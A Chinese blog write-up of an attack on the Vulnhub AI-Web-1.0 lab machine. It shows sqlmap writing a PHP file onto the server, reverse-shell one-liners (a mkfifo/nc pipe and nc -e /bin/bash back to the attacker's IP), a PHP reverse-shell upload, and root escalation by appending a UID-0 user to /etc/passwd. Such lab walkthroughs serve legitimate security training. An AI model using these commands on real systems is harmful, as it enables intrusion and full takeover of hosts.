Ai-web-1.0靶机中的骚操作

已于 2022-11-10 07:43:14 修改
阅读量319 收藏
点赞数
文章标签: php 服务器 开发语言
于 2022-11-05 22:35:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51692662/article/details/127707504
版权

 一、sqlmap实现文件上传

 sqlmap -u "http://192.168.127.139/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/2.php

 1.php写入<?php phpinfo();?>

–file-write:去读取文件(1.php)
–file-dest:后面加目标的绝对路径 已经生成木马的名称(2.php)//网站必须有写入权限

abf936f3f61445c88c66e2bd8b39ce78.png

 写入成功8f28cc5dc41449e3bfdc39557a316c37.png

 二、另类反弹shell

1、重定向反弹

cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo

这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口20000上。至此,我们已经把netcat的输出重定向到fifo文件中。

tmp是一个临时文件目录,/bin/sh -i 2>&1是用来重定向标准错误输出和标准输出

kali监听6666端口 nc -lvvp 6666

385dcd8d4f614493b400c0363f0fc09f.png

 nc -e /bin/bash ip 6666 发现e参数不可用  4361608381344846add7dfa6bb0c7222.png

 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc  ip 6666 >/tmp/f

可以反弹shell

2、php反弹

之前写入文件也在(2.php)

357c24888c3449118efa6ff17c3036ec.png

 /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/2.php

此目录很可能是一个文件上传目录 根据上图一个一个试

在最后一个目录发现上传地址

14be070606184be48fd072beb61e8729.png

 创建一个php反弹shell脚本,并上传

 cb0780fea0d34f40a3a2925e57157745.png

上传成功

92f20207b53a4f828d58b30c76ff11e8.png

 在kali中监听9966端口,然后在os-shell运行hack.php,多尝试几次

kali接收shell,ls查看文件,反弹成功

 daa8a31c8d464f4c859a515a624305a2.png

 700ac8c86f8645ee84d4555a921c4d3c.png

 三、passwd提升权限

#利用openssl生成加密的密码, 语法:openssl passwd-1-salt[salt value]password
openssl passwd -1 -salt user3 pass123

#mkpasswd类似于openssl passwd,它将生成指定密码字符串的哈希值。
mkpasswd -m SHA-512 pass

#利用python中的crypt库生成
python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'

#利用Perl和crypt来使用salt值为我们的密码生成哈希值
perl -le 'print crypt("pass123", "abc")'

#php语言
php -r "print(crypt('aarti','123') . " ");"

其中slat是任意值

python -c "import pty;pty.spawn('/bin/bash')"

先进入交互界面,不然会报错

mkpasswd方法生成123456加密信息为mdlcLmLJA3EYc:0:0

echo 'shabi:mdlcLmLJA3EYc:0:0:root:/root:/bin/bash' >> /etc/passwd
按照规则加入/etc/passwd

su shabi 输入密码123456

id查看为root权限 

1b5819ee0c994a51aceb602e94d67651.png

 

 

 

 

安全~小菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
SA权限的注入点直接上传文件
10-13
SA权限的注入点可以直接向服务器上传文件。。。
SQLmap学习笔记
B_l_a_nk的博客
04-07 800
sqlmap的一些简单使用和一些基本命令
getshell姿势(四)--SQL注入
qq_45936617的博客
10-06 91
当发现目标存在SQL注入时,我们也可以使用sqlmap工具获取目标服务器的命令执行权限。使用的命令是SQLMAP的--os-shell。使用命令的条件是:1、当前用户有文件读写权限2、secure_file_priv的值不为NULL3、知道网站的绝对路径该命令的利用原理:1、使用用户具有的文件写权限,在网站写一个文件上传文件2、通过文件上传文件,上传命令交互的文件。
SQLMap使用详解
热门推荐
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库的表名:5、获取表的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2376
AI-WEB-1.0靶机的简单攻略
vulnhub靶机AI-Web-1.0小白渗透学习笔记
qq_45885854的博客
06-12 272
vulnhub靶机AI-Web-1.0小白基础渗透学习,主要学习渗透思维,常见工具的使用sqlmap、dirb、python提权,修改用户名等
SQLmap上传脚本getshell
weixin_43006749的博客
08-29 5213
sqlmap简介 sqlmap是一个渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项,能够获取数据库存储的数据,访问操作系统文件,执行操作系统命令等。 以下是简单的参数介绍: 请求 命令 注释 –date=DATE #通过post发送数据: –cookie=COOKIE #cookie头的值 –user-...
利用sqlmap和蚁剑进行简单的渗透测试和挂小马操作
dbabs的博客
01-24 572
利用sqlmap进行文件上传和简单的渗透测试
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4
实现ibatis手动控制加载sqlmap文件,终于不用重启应用了
06-19
实现ibatis手动控制加载sqlmap文件,终于不用重启应用了
安装部署Web安全测试用的靶机
11-24
个人作业,希望有所帮助
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
行业文档-设计装置-自动换靶机和连体靶纸.zip
08-21
行业文档-设计装置-自动换靶机和连体靶纸.zip
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1321
在刚才信息收集我们在robots.txt文件发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 3989
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
安全工具之SQLMAP
qq_46085232的博客
07-12 79
SQLMAPSQLMAP常见使用特定参数原理os-shell原理 SQLMAP SQLMAP就是针对SQL注入漏洞的检测和利用工具 常见使用 python sqlmap/sqlmap.py -u "http://url/news?id=1" --current-user #获取当前用户名称 python sqlmap/sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db #获取当前数据库名称 python sqlmap/sqlmap.py -u
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2545
AI-WEB-1.0 多方法渗透
使用python-socket库实现对靶机的系统识别
06-03
使用Python的socket库可以实现对靶机的系统识别。具体实现步骤如下: 1. 导入socket库: ```python import socket ``` 2. 创建socket连接: ```python client_socket = socket.socket(socket.AF_INET, socket.SOCK...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值